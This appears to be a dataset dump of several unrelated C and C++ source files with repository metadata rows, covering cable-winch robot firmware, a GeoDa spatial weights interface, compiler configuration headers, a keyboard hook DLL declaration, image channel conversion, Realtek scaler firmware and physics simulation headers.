modbus_holding_regs[motdxmm] = (int) motdxt;
}
modbus_holding_regs[motaymm] = 0;
modbus_holding_regs[motbymm] = (int) motbyt;
modbus_holding_regs[motcymm] = (int) motcyt;
modbus_holding_regs[motdymm] = 0;
}
struct input_lengths mot_coord2sides(int max,int may,int mbx,int mby,int mcx,int mcy,int mdx,int mdy) {
struct input_lengths kdf;
kdf.ab = sqrt(pow(max-mbx,2)+pow(may-mby,2));
kdf.cd = sqrt(pow(mcx-mdx,2)+pow(mcy-mdy,2));
kdf.ad = sqrt(pow(max-mdx,2)+pow(may-mdy,2));
kdf.ac = sqrt(pow(max-mcx,2)+pow(may-mcy,2));
kdf.bd = sqrt(pow(mbx-mdx,2)+pow(mby-mdy,2));
return kdf;
}
//</new>
//////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////
unsigned int total_path_points;
XYZ_coord_struct_int generated_path[1024];
unsigned int max(unsigned int a, unsigned int b, unsigned int c)
{
if(a>b && a>c)
return a;
else if(b>a && b>c)
return b;
else
return c;
}
//this function will update global scaled_speed by using the ratio of cable lengths
//this is so that all winch will finish actuating the tether at around the same time
void update_scaled_velocity(float difference1, float difference2,float difference3,float difference4)
{
if (dip_switch.BIT4) //this is used to skip scaled velocity
{
modbus_holding_regs[scaled_velocity] = modbus_holding_regs[Max_Velocity];
return;
}
float longest_difference = difference1;
if(longest_difference < difference2)
longest_difference = difference2;
if(longest_difference < difference3)
longest_difference = difference3;
if(longest_difference < difference4)
longest_difference = difference4;
//todo: this section can be simplified using an array
switch(modbus_holding_regs[Winch_ID])
{
case 0:
{
modbus_holding_regs[scaled_velocity] = (int)((float)modbus_holding_regs[Max_Velocity]*difference1/longest_difference);
break;
}
case 1:
{
modbus_holding_regs[scaled_velocity] = (int)((float)modbus_holding_regs[Max_Velocity]*difference2/longest_difference);
break;
}
case 2:
{
modbus_holding_regs[scaled_velocity] = (int)((float)modbus_holding_regs[Max_Velocity]*difference3/longest_difference);
break;
}
case 3:
{
modbus_holding_regs[scaled_velocity] = (int)((float)modbus_holding_regs[Max_Velocity]*difference4/longest_difference);
break;
}
}
}
//taken from http://members.chello.at/easyfilter/bresenham.html
//will return 1 if overflowed
signed long brensenham3d(signed long x0, signed long y0, signed long z0, signed long x1, signed long y1, signed long z1)
{
signed long dx = abs(x1-x0), sx = x0<x1 ? 1 : -1;
signed long dy = abs(y1-y0), sy = y0<y1 ? 1 : -1;
signed long dz = abs(z1-z0), sz = z0<z1 ? 1 : -1;
signed long dm = max(dx,dy,dz), i = dm; /* maximum difference */
x1 = y1 = z1 = dm/2; /* error offset */
signed long path_pointer = 0, overflowed = 0;
for(;;) {
// future: add better point limit check
if (path_pointer>=1024)
{
overflowed = 1;
break;
}
generated_path[path_pointer].X = x0;
generated_path[path_pointer].Y = y0;
generated_path[path_pointer].Z = z0;
path_pointer += 1;
if (i-- == 0) break;
x1 -= dx; if (x1 < 0) { x1 += dm; x0 += sx; }
y1 -= dy; if (y1 < 0) { y1 += dm; y0 += sy; }
z1 -= dz; if (z1 < 0) { z1 += dm; z0 += sz; }
}
total_path_points = path_pointer;
return overflowed;
}
float pulse_length_scaler()
{
return ((float)modbus_holding_regs[Encoder_Pulse]) /
((float)modbus_holding_regs[Encoder_Radius]*2.0f*3.14159265359f/1000.0f);
}
int32_t length_to_encoder_pulses(int length_in_mm)
{
//count = cable_length * pulse_per_revolution * gear_ratio / spool_diameter / PI
//uint32_t count = (uint32_t)(((float)length_in_mm) * 8192.0f * 1.0f / 35.0f / 3.14159265359f);
return (int32_t) (((float)length_in_mm) * pulse_length_scaler()); // was 74.5027025, 81.48733086f
}
int32_t encoder_pulses_to_length(int32_t encoder_pulses)
{
return (int32_t)(((float) encoder_pulses) / pulse_length_scaler()); //(8192.0f / ((float)modbus_holding_regs[Encoder_Radius] * 2.0f) / 3.14159265359f));
}
//this function is used for fetching waypoints from modbus buffer
//axis X,Y,Z is mapped to 0,1,2
uint32_t waypoints(int index, int axis)
{
return (uint32_t) modbus_holding_regs[X1 + (index*3) + axis];
}
| 34.595745 | 209 | 0.606259 |
4472c6adaae87dcf48c5ca353f8c8decef25f097 | 3,266 | h | C | VarCalc/WeightsManInterface.h | chenyoujie/GeoDa | 87504344512bd0da2ccadfb160ecd1e918a52f06 | [
"BSL-1.0"
] | null | null | null | VarCalc/WeightsManInterface.h | chenyoujie/GeoDa | 87504344512bd0da2ccadfb160ecd1e918a52f06 | [
"BSL-1.0"
] | null | null | null | VarCalc/WeightsManInterface.h | chenyoujie/GeoDa | 87504344512bd0da2ccadfb160ecd1e918a52f06 | [
"BSL-1.0"
] | null | null | null | /**
* GeoDa TM, Copyright (C) 2011-2014 by Luc Anselin - all rights reserved
*
* This file is part of GeoDa.
*
* GeoDa is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* GeoDa is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef __GEODA_CENTER_WEIGHTS_MAN_INTERFACE_H__
#define __GEODA_CENTER_WEIGHTS_MAN_INTERFACE_H__
#include <list>
#include <set>
#include <vector>
#include <boost/uuid/uuid.hpp>
#include <boost/uuid/nil_generator.hpp>
#include "WeightsMetaInfo.h"
#include "GdaFlexValue.h"
class GalWeight;
class GeoDaWeight;
class ProgressDlg;
// ToDo: There is no need to have a "WeightsManInterface" since there is only
// one implementation: WeightsNewManager, which should be used instead of an
// interface.
class WeightsManInterface
{
public:
virtual void GetIds(std::vector<boost::uuids::uuid>& ids) const = 0;
virtual boost::uuids::uuid FindIdByMetaInfo(const WeightsMetaInfo& wmi) const = 0;
virtual boost::uuids::uuid FindIdByFilename(const wxString& file) const = 0;
virtual boost::uuids::uuid FindIdByTitle(const wxString& title) const = 0;
virtual boost::uuids::uuid RequestWeights(const WeightsMetaInfo& wmi) = 0;
virtual bool WeightsExists(boost::uuids::uuid w_uuid) const = 0;
virtual WeightsMetaInfo GetMetaInfo(boost::uuids::uuid w_uuid) const = 0;
virtual wxString GetShortDispName(boost::uuids::uuid w_uuid) const = 0;
virtual wxString GetLongDispName(boost::uuids::uuid w_uuid) const = 0;
virtual std::list<boost::uuids::uuid> GetIds() const = 0;
virtual WeightsMetaInfo::SymmetryEnum IsSym(boost::uuids::uuid w_uuid) const = 0;
virtual WeightsMetaInfo::SymmetryEnum CheckSym(boost::uuids::uuid w_uuid,
ProgressDlg* p_dlg=0) = 0;
virtual bool Lag(boost::uuids::uuid w_uuid, const GdaFlexValue& data,
GdaFlexValue& result) = 0;
virtual bool GetCounts(boost::uuids::uuid w_uuid,
std::vector<long>& counts) = 0;
virtual void GetNbrsExclCores(boost::uuids::uuid w_uuid,
const std::set<long>& cores,
std::set<long>& nbrs) = 0;
virtual void Remove(boost::uuids::uuid w_uuid) = 0;
virtual wxString RecNumToId(boost::uuids::uuid w_uuid, long rec_num) = 0;
virtual GalWeight* GetGal(boost::uuids::uuid w_uuid) = 0;
virtual GeoDaWeight* GetWeights(boost::uuids::uuid w_uuid) = 0;
virtual boost::uuids::uuid GetDefault() const = 0;
virtual void MakeDefault(boost::uuids::uuid w_uuid) = 0;
virtual boost::uuids::uuid FindByTitle(const wxString& s) const = 0;
virtual wxString SuggestTitleFromFileName(const wxString& fname) const = 0;
virtual wxString GetTitle(boost::uuids::uuid w_uuid) const = 0;
virtual void SetTitle(boost::uuids::uuid w_uuid, const wxString& s) = 0;
virtual bool IsValid(boost::uuids::uuid w_uuid) = 0;
};
#endif
| 42.973684 | 83 | 0.741886 |
cd1a9e6f0e7a14f59a23e6fb24f10f723f411d7d | 2,318 | h | C | include/owl/private/borlandc.h | pierrebestwork/owl-next | 94ba85e8b4dcb978f095b479f85fe4ba3af2fe4e | [
"Zlib"
] | null | null | null | include/owl/private/borlandc.h | pierrebestwork/owl-next | 94ba85e8b4dcb978f095b479f85fe4ba3af2fe4e | [
"Zlib"
] | null | null | null | include/owl/private/borlandc.h | pierrebestwork/owl-next | 94ba85e8b4dcb978f095b479f85fe4ba3af2fe4e | [
"Zlib"
] | null | null | null | //
/// \file
/// Compiler-specific defines for Borland C++ and C++Builder
//
// Part of OWLNext - the next generation Object Windows Library
// Copyright (c) 1995, 1996 by Borland International, All Rights Reserved
//
// For more information, including license details, see
// http://owlnext.sourceforge.net
//
#if !defined(OWL_PRIVATE_BORLANDC_H)
#define OWL_PRIVATE_BORLANDC_H
//
// The following workaround for BCC32 is needed because this compiler cannot cope with the adaptor
// AnyDispatch, which is used to fit the new dispatch functions into the old response table format.
// An error is generated at the instantiation of the AnyDispatch template. So, to circumvent this
// issue we enforce the new response table format for BCC32.
//
#if defined(OWL5_COMPAT) && defined(__BORLANDC__) && !defined(__clang__)
#define OWL_NEW_RESPONSE_TABLE 1
#pragma message("Warning OWLNext include/owl/private/borlandc.h 37: " \
"BCC32 does not support the compatibility layer for old response tables. " \
"As a workaround, the new response table format is used even in OWL5_COMPAT mode.")
#endif
//
// The following workaround for BCC32 is needed because BCC32 chokes on SignatureCheck in response
// table entries. However, explicit signature checking is not needed for BCC32 anyway, since its
// error message for a handler signature mismatch will include the correct signature already.
//
#if defined (__BORLANDC__) && !defined(__clang__)
#define OWL_EV_SIGNATURE_CHECK 0
#endif
#define BI_COMP_BORLANDC __BORLANDC__
#if defined(__clang__)
#define BI_COMP_CLANG
#endif
#define BI_HAS_PRAGMA_ONCE
#if defined(OWL5_COMPAT) && !defined(UNICODE)
#define OWL_SUPPORT_BWCC
#define OWL_SUPPORT_CTL3D
#endif
#define BI_DEFINE_MINMAX_TMPL
#define BI_MULTI_THREAD
#if defined(__MT__)
#define BI_MULTI_THREAD_RTL
#endif
#ifdef UNICODE
#define _USE_OLD_RW_STL
#endif
#if !defined(BI_OWL_PACKING)
#define BI_OWL_PACKING 8
#endif
#if !defined(OWL_BREAK)
#define OWL_BREAK {DebugBreak();}
#endif
#define OWL_OUTPUT_DEBUG_STRING(lpsz) ::OutputDebugString(lpsz)
#if defined(BI_COMP_CLANG)
#define OWL_HAS_STD_EXCEPTION_PTR
#endif
//
// Include link directives
//
#if !defined(_BUILDOWLDLL)
#include <owl/private/owllink.h>
#endif
#endif
| 28.268293 | 101 | 0.753236 |
28ac60b5aafb4774213841b346d4d0799a1fa2ca | 907 | h | C | examples/specific/template_class_non_type.h | johnrscott/breathe | a656a959093737a8972a308170c86889a1cae5b2 | [
"BSD-3-Clause"
] | 3 | 2016-08-29T09:17:57.000Z | 2016-10-18T05:01:25.000Z | examples/specific/template_class_non_type.h | johnrscott/breathe | a656a959093737a8972a308170c86889a1cae5b2 | [
"BSD-3-Clause"
] | 1 | 2021-03-20T05:32:03.000Z | 2021-03-20T05:32:03.000Z | examples/specific/template_class_non_type.h | johnrscott/breathe | a656a959093737a8972a308170c86889a1cae5b2 | [
"BSD-3-Clause"
] | 1 | 2021-09-02T18:37:40.000Z | 2021-09-02T18:37:40.000Z | /**
* @brief a class with three template parameters
*
* @tparam T this is the first template parameter
* @tparam U this is the second template parameter
* @tparam N this is the third template parameter, it is a non-type parameter
*/
template <typename T, typename U, int N>
class anothertemplateclass
{
public:
/// default constructor
anothertemplateclass() {}
/**
* @brief constructor with two template argument
*
* @param m1 first argument
* @param m2 second argument
*/
anothertemplateclass(T const & m1, U const & m2) :
member1(m1), member2(m2) {}
/**
* @brief member accepting template argument and returning template argument
*
* @param t argument
* @return returns value of type U
*/
U method(T const & t);
private:
/// a member with templated type
T member1;
/// another member with templated type
U member2;
};
| 23.25641 | 78 | 0.662624 |
2f417d1e493b40ad4ad28d2e896c1eb8c1c67481 | 526 | h | C | GlobalKeyLib/include/GlobalKeyboard.h | sols000/GlobalKeySharp | a8e6d10bcac4bb1408b95c8383cfb7b347209951 | [
"MIT"
] | 1 | 2019-05-14T11:39:15.000Z | 2019-05-14T11:39:15.000Z | GlobalKeyLib/include/GlobalKeyboard.h | sols000/GlobalKeySharp | a8e6d10bcac4bb1408b95c8383cfb7b347209951 | [
"MIT"
] | null | null | null | GlobalKeyLib/include/GlobalKeyboard.h | sols000/GlobalKeySharp | a8e6d10bcac4bb1408b95c8383cfb7b347209951 | [
"MIT"
] | null | null | null | // 下列 ifdef 块是创建使从 DLL 导出更简单的
// 宏的标准方法。此 DLL 中的所有文件都是用命令行上定义的 GLOBALKEYBOARD_EXPORTS
// 符号编译的。在使用此 DLL 的
// 任何项目上不应定义此符号。这样,源文件中包含此文件的任何其他项目都会将
// GLOBALKEYBOARD_API 函数视为是从 DLL 导入的,而此 DLL 则将用此宏定义的
// 符号视为是被导出的。
#ifdef GLOBALKEYBOARD_EXPORTS
#define GLOBALKEYBOARD_API __declspec(dllexport)
#else
#define GLOBALKEYBOARD_API __declspec(dllimport)
#endif
typedef void(__cdecl *pfnKeyBoardEvent)(unsigned long KeyCode, bool bPressed);
extern "C" GLOBALKEYBOARD_API void __cdecl SetGlobalKeyListner(pfnKeyBoardEvent Callback);
| 32.875 | 90 | 0.825095 |
facf185fb06d8d36ed66c5a21a9bab5e3adb0a87 | 7,614 | h | C | Util/ChannelConverter.h | mkazhdan/DMG | 60dc4e1fe4d078ddaec694c388af57b7cdb748ff | [
"MIT"
] | 25 | 2015-12-29T20:48:24.000Z | 2021-08-09T07:03:40.000Z | Util/ChannelConverter.h | mkazhdan/DMG | 60dc4e1fe4d078ddaec694c388af57b7cdb748ff | [
"MIT"
] | 2 | 2016-02-02T01:34:07.000Z | 2021-05-13T16:41:07.000Z | Util/ChannelConverter.h | mkazhdan/DMG | 60dc4e1fe4d078ddaec694c388af57b7cdb748ff | [
"MIT"
] | 9 | 2016-01-31T05:46:44.000Z | 2022-01-16T07:09:42.000Z | /*
Copyright (c) 2008, Michael Kazhdan
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer. Redistributions in binary form must reproduce
the above copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the distribution.
Neither the name of the Johns Hopkins University nor the names of its contributors
may be used to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
*/
#ifndef CHANNEL_CONVERTER_INCLUDED
#define CHANNEL_CONVERTER_INCLUDED
#include <stdint.h>
#include "Util/Half/half.h"
template< class Real > bool IsFloatType( void );
template< > inline bool IsFloatType< half > ( void ){ return true; }
template< > inline bool IsFloatType< float > ( void ){ return true; }
template< > inline bool IsFloatType< double > ( void ){ return true; }
template< class Real > bool IsFloatType ( void ){ return false; }
template< class Real >
class ConversionFactor
{
public:
static const double Factor;
static const double FactorR;
static const double Offset;
};
template<> const double ConversionFactor< char >::Factor = (double)( ( (long long)(1)<< 8)-1 );
template<> const double ConversionFactor< unsigned char >::Factor = (double)( ( (long long)(1)<< 8)-1 );
template<> const double ConversionFactor< int16_t >::Factor = (double)( ( (long long)(1)<<16)-1 );
template<> const double ConversionFactor< uint16_t >::Factor = (double)( ( (long long)(1)<<16)-1 );
template<> const double ConversionFactor< int >::Factor = (double)( ( (long long)(1)<<32)-1 );
template<> const double ConversionFactor< unsigned int >::Factor = (double)( ( (long long)(1)<<32)-1 );
template<> const double ConversionFactor< double >::Factor = 1.;
template<> const double ConversionFactor< half >::Factor = 1.;
template<> const double ConversionFactor< float >::Factor = 1.;
template<> const double ConversionFactor< char >::FactorR = 1./(double)( ( (long long)(1)<< 8)-1 );
template<> const double ConversionFactor< unsigned char >::FactorR = 1./(double)( ( (long long)(1)<< 8)-1 );
template<> const double ConversionFactor< int16_t >::FactorR = 1./(double)( ( (long long)(1)<<16)-1 );
template<> const double ConversionFactor< uint16_t >::FactorR = 1./(double)( ( (long long)(1)<<16)-1 );
template<> const double ConversionFactor< int >::FactorR = 1./(double)( ( (long long)(1)<<32)-1 );
template<> const double ConversionFactor< unsigned int >::FactorR = 1./(double)( ( (long long)(1)<<32)-1 );
template<> const double ConversionFactor< double >::FactorR = 1.;
template<> const double ConversionFactor< half >::FactorR = 1.;
template<> const double ConversionFactor< float >::FactorR = 1.;
template<> const double ConversionFactor< char >::Offset = 0.5;
template<> const double ConversionFactor< unsigned char >::Offset = 0.5;
template<> const double ConversionFactor< int16_t >::Offset = 0.5;
template<> const double ConversionFactor< uint16_t >::Offset = 0.5;
template<> const double ConversionFactor< int >::Offset = 0.5;
template<> const double ConversionFactor< unsigned int >::Offset = 0.5;
template<> const double ConversionFactor< double >::Offset = 0.0;
template<> const double ConversionFactor< half >::Offset = 0.0;
template<> const double ConversionFactor< float >::Offset = 0.0;
template< class In > inline double ChannelToDouble( const In& in ){ return ( (double)in + ConversionFactor< In >::Offset ) * ConversionFactor< In >::FactorR; }
template< class Out > inline Out ChannelFromDouble( double in ){ return (Out)( in * ConversionFactor< Out >::Factor ); }
template< class In , class Out >
class Converter
{
public:
static const double ConvertFactor;
static const double ConvertOffset;
};
template< class In , class Out > const double Converter< In , Out >::ConvertFactor = ConversionFactor< Out >::Factor * ConversionFactor< In >::FactorR;
template< class In , class Out > const double Converter< In , Out >::ConvertOffset = ConversionFactor< Out >::Offset;
// [WARNING] When using integer indices, this definition of a channel converter allocates slightly smaller bins for the first and last buckets.
// The alternative is to use half open intervals of the same length, but this would require explicitly performing bounds testing.
template< class In , class Out > inline Out ConvertChannel( const In& in ) { return Out( double( in )*Converter< In , Out >::ConvertFactor + Converter< In , Out >::ConvertOffset ); }
template< class InChannelType , class OutChannelType >
void ConvertRow( ConstPointer( InChannelType ) inRow , Pointer( OutChannelType ) outRow , int width , int inChannels , int outChannels )
{
if( inChannels!=1 && inChannels!=3 && inChannels!=4 ) fprintf( stderr , "[ERROR] ConvertRow: only Gray, RGB, and RGBA supported: %d\n" , inChannels ) , exit( 0 );
if( outChannels!=1 && outChannels!=3 && outChannels!=4 ) fprintf( stderr , "[ERROR] ConvertRow: only Gray, RGB, and RGBA supported: %d\n" , outChannels ) , exit( 0 );
if( inChannels==outChannels ) for( int i=0 ; i<width*inChannels ; i++ ) outRow[i] = ConvertChannel< InChannelType , OutChannelType >( inRow[i] );
else if( outChannels==1 )
{
if( inChannels==3 || inChannels==4 )
{
for( int i=0 ; i<width ; i++ )
{
double sum = ConvertChannel< InChannelType , double >( inRow[i*inChannels] ) + ConvertChannel< InChannelType , double >( inRow[i*inChannels+1] ) + ConvertChannel< InChannelType , double >( inRow[i*inChannels+2] );
outRow[i] = ConvertChannel< double , OutChannelType >( sum/3. );
}
}
}
else if( outChannels==3 )
{
if ( inChannels==1 ) for( int i=0 ; i<width ; i++ ) outRow[i*3+0] = outRow[i*3+1] = outRow[i*3+2] = ConvertChannel< InChannelType , OutChannelType >( inRow[i] );
else if( inChannels==4 ) for( int i=0 ; i<width ; i++ ) for( int c=0 ; c<3 ; c++ ) outRow[i*3+c] = ConvertChannel< InChannelType , OutChannelType >( inRow[i*4+c] );
}
else if( outChannels==4 )
{
if ( inChannels==1 ) for( int i=0 ; i<width ; i++ ) outRow[i*4+0] = outRow[i*4+1] = outRow[i*4+2] = ConvertChannel< InChannelType , OutChannelType >( inRow[i] ) , outRow[i*4+3] = ConvertChannel< double , OutChannelType >( 1. );
else if( inChannels==3 ) for( int i=0 ; i<width ; i++ ) for( int c=0 ; c<3 ; c++ ) outRow[i*4+c] = ConvertChannel< InChannelType , OutChannelType >( inRow[i*3+c] ) , outRow[i*4+3] = ConvertChannel< double , OutChannelType >( 1. );;
}
}
#endif // CHANNEL_CONVERTER_INCLUDED | 61.902439 | 233 | 0.700552 |
2823ee0297b8e979f48df67842a725beaf5db825 | 3,750 | c | C | Sources/source_code_1/KR2660_DMB_AV_TV_VGA_WJ_20100331/Core/code/Main.c | notjoms/RTD2660_PCB800099 | bb33f514885603f27ac67c5cc5449b7273d3b7c9 | [
"MIT"
] | 62 | 2017-09-05T11:17:30.000Z | 2022-03-30T21:26:21.000Z | Sources/source_code_1/KR2660_DMB_AV_TV_VGA_WJ_20100331/Core/code/Main.c | notjoms/RTD2660_PCB800099 | bb33f514885603f27ac67c5cc5449b7273d3b7c9 | [
"MIT"
] | 2 | 2017-10-11T07:06:11.000Z | 2021-09-27T18:51:41.000Z | Sources/source_code_1/KR2660_DMB_AV_TV_VGA_WJ_20100331/Core/code/Main.c | notjoms/RTD2660_PCB800099 | bb33f514885603f27ac67c5cc5449b7273d3b7c9 | [
"MIT"
] | 37 | 2017-10-22T19:22:56.000Z | 2022-01-14T14:40:29.000Z | //----------------------------------------------------------------------------------------------------
// Copyright of Realtek SemiConductor Corp.
// Version : V1.00c (09.15.2009)
//
//----------------------------------------------------------------------------------------------------
//----------------------------------------------------------------------------------------------------
// ID Code : Main.c No.0002
// Update Note :
//
//----------------------------------------------------------------------------------------------------
#define __MAIN__
#include "Core\Header\Include.h"
/**
* CMainUserInitial
* Setting some flags for user when initial
* @param <none>
* @return {none}
*
*/
void CMainUserInitial(void)
{
// User can make some initial settings at firmware startup
CLR_PANELPOWERSTATUS();
CLR_LIGHTPOWERSTATUS();
CLR_FRAMESYNCSTATUS();
CLR_POWERSWITCH();
CLR_FIRST_ADCCLOCK();
CLR_OSD_READYFORDISPLAY();
#if(_HDMI_SUPPORT == _ON)
CLR_HDMIINPUT();
#endif
SET_FIRST_LOADFONT();
#if defined(CONFIG_VBI_ENABLE)
CLR_OSDVBI_INITIAL();
#endif
//SET_SOURCE_AUTOCHANGE();
CLR_SOURCE_AUTOCHANGE();
SET_PRE_VGA_CONNECT(bVGACONNECT);
#if(_TMDS_SUPPORT == _ON)
#if (_HDMI_SUPPORT == _ON)
SET_PRE_HDMI_CONNECT(bHDMICONNECT);
#else
SET_PRE_DVI_CONNECT(bDVICONNECT);
#endif
#endif
CLR_USE_TRANSITION_RESULT();
CheckLanguage();
}
//-------------------------------------------------------------------------
//-------------------------------------------------------------------------
/**
* CMainSystemInitial
* Initial the system for once when power up
* @param <none>
* @return {none}
*
*/
void CMainSystemInitial(void)
{
#if(_VIDEO_TV_SUPPORT)
#if(_IF_PLL_DE_CHIP == _IF_PLL_DE_1338 || _IF_PLL_DE_CHIP == _IF_PLL_DE_135X)
ucAddrIfPllDM = _ADDR_IfPllDM;
#endif
#endif
// Initial MCU
CMcuInitial();
CMuteOn();
#if(_HDCP_SUPPORT == _ON && _HDMI_HOT_PLUG_OPTION)
bHot_Plug = _HOT_PLUG_LOW;
bHot_Plug2 = _HOT_PLUG_LOW;
#endif
CUartSendString("Init timer\n");
// Initial timer events
CTimerInitialTimerEvent();
//CMuteOn();
CPowerLightPowerOff();
CPowerPanelPowerOff();
CUartSendString("Init flash\n");
#if(_MEMORY_LOCATION == _FLASH)
InitFlash();
#endif
CUartSendString("eeprom check\n");
// Check eeprom and load eeprom settings
CEepromStartupCheck();
//_SET_INPUT_SOURCE(_SOURCE_VIDEO_AV);
if(GET_POWERSTATUS()) // Power up
CPowerLedRed();
else
{
CPowerLedOff();
}
CUartSendString("scaer init\n");
// Initial scaler settings
CScalerInitial();
CUartSendString("key init\n");
// Initial key scan status
CKeyInitial();
CUartSendString("user init\n");
// Initial user settings
CMainUserInitial();
CUartSendString("DDC init\n");
CDDCCIInitial();
#if(_RS232_EN)
CUartInit();
#endif
CUartSendString("IR init\n");
CIrdaInitial();
CUartSendString("Get Extend \n");
GetExtendEnable();
SetPanelLR();
SetPanelUD();
SetFM();
//CUartSendString("init over \n");
}
/**
* main
* main process
* first system initial, then main loop
* @param <none>
* @return {none}
*
*/
void main(void)
{
CMainSystemInitial();
CUartSendString("Begin...\n");
do
{
CMiscIspDebugProc();
CTimerHandler();
CKeyHandler();
CModeHandler();
COsdHandler();
}while(_TRUE);
}
/*
void DbgLed(unsigned char ucCount)
{
unsigned char i;
for(i=0; i<ucCount; i++)
{
CPowerLedOrange();
CTimerDelayXms(100);
CPowerLedRed();
CTimerDelayXms(100);
}
CPowerLedGreen();
}
*/
| 20.604396 | 102 | 0.546133 |
1ace9d2928b9e8ddd92a9eff149d1cf401225a15 | 384 | h | C | FMESimulation/inc/ParticleDrag.h | FullMetalNicky/FullMetalEngine | 26fbdd14332f9ab158180efea176e7aaa47f570c | [
"MIT"
] | 12 | 2018-08-05T17:55:40.000Z | 2021-08-22T07:17:12.000Z | FMESimulation/inc/ParticleDrag.h | FullMetalNicky/FullMetalEngine | 26fbdd14332f9ab158180efea176e7aaa47f570c | [
"MIT"
] | null | null | null | FMESimulation/inc/ParticleDrag.h | FullMetalNicky/FullMetalEngine | 26fbdd14332f9ab158180efea176e7aaa47f570c | [
"MIT"
] | 1 | 2020-06-08T10:46:05.000Z | 2020-06-08T10:46:05.000Z | #ifndef PARTICLEDRAG_H_
#define PARTICLEDRAG_H_
#include "IParticleForce.h"
namespace FME
{
namespace Simulation
{
class ParticleDrag : public IParticleForce
{
public:
ParticleDrag(const glm::vec2& kCoeffs);
virtual void Update(std::shared_ptr<Particle> particle, float deltaTime);
private:
glm::vec2 m_kCoeffs;
};
}
}
#endif
| 13.714286 | 77 | 0.669271 |
ff8ff8f029a9007c03eb8c5bce081054733d0860 | 5,426 | h | C | c++/PCG/src/ConstraintJoint.h | sueda/redmax | 0a8864e882cbb8afe471314829d591790b915e56 | [
"MIT"
] | 63 | 2019-05-09T03:25:37.000Z | 2022-01-17T07:05:35.000Z | c++/PCG/src/ConstraintJoint.h | sueda/redmax | 0a8864e882cbb8afe471314829d591790b915e56 | [
"MIT"
] | 1 | 2019-05-13T23:17:13.000Z | 2019-05-22T10:49:52.000Z | c++/PCG/src/ConstraintJoint.h | sueda/redmax | 0a8864e882cbb8afe471314829d591790b915e56 | [
"MIT"
] | 8 | 2019-05-06T02:03:12.000Z | 2021-07-07T11:01:27.000Z | #pragma once
#ifndef __ConstraintJoint__
#define __ConstraintJoint__
#include "Constraint.h"
#include "RigidBodyUtility.h"
#include "State.h"
#include <string>
struct LinkageSystem;
//struct State;
struct StateDeriv;
struct StateSolve;
// ----------------------------------------------------//
// Rotation axis of a block is defined by the location //
// of the joint connecting it to its parent //
// ----------------------------------------------------//
class ConstraintJoint : public Constraint
{
public:
EIGEN_MAKE_ALIGNED_OPERATOR_NEW
static void init(std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, std::unique_ptr<State> & S);
static void loadIntoLinkageSystem(const std::unique_ptr<LinkageSystem> &LS);
static void loadOptimalJointOrdering(const std::unique_ptr<LinkageSystem> &LS, std::unique_ptr<State> & S);
static void update(std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
//TODO:'static' member function overrides a virtual function in a base class
static void draw(const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> & LS, const std::unique_ptr<State> & S);
static int getConstraintNumMaximal(const std::unique_ptr<LinkageSystem> & LS);
static int getConstraintNumReduced(const std::unique_ptr<LinkageSystem> & LS);
static int getConstraintNumAdditnl(const std::unique_ptr<LinkageSystem> & LS);
static int getConstraintNumAdditnlMaximal(const std::unique_ptr<LinkageSystem> & LS);
static void computeJ_Jdot_x_unopt(Eigen::VectorXd &J_x, Eigen::VectorXd &Jdot_x, const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static void computeJ_x_unopt(Eigen::VectorXd &J_x, const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static Eigen::VectorXd computeM_x_unopt(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S);
static Eigen::VectorXd computeLHS_x_unopt(const Eigen::VectorXd & x, const std::unique_ptr<StateSolve>& SS, const std::unique_ptr<LinkageSystem>& LS, const std::unique_ptr<State>& S);
static void computeStiffnessDampingJoint_unopt(Eigen::VectorXd &LHSx, const Eigen::VectorXd & qdot, const Eigen::VectorXd & q, std::unique_ptr<StateSolve>& SS, const std::unique_ptr<LinkageSystem>& LS, const std::unique_ptr<State>& S);
static Eigen::VectorXd computeJT_x_unopt(const Eigen::VectorXd &x, const std::unique_ptr<StateSolve> &SS, const std::unique_ptr<LinkageSystem> &LS, const std::unique_ptr<State> &S, std::shared_ptr<State::local_mt> lmt = nullptr);
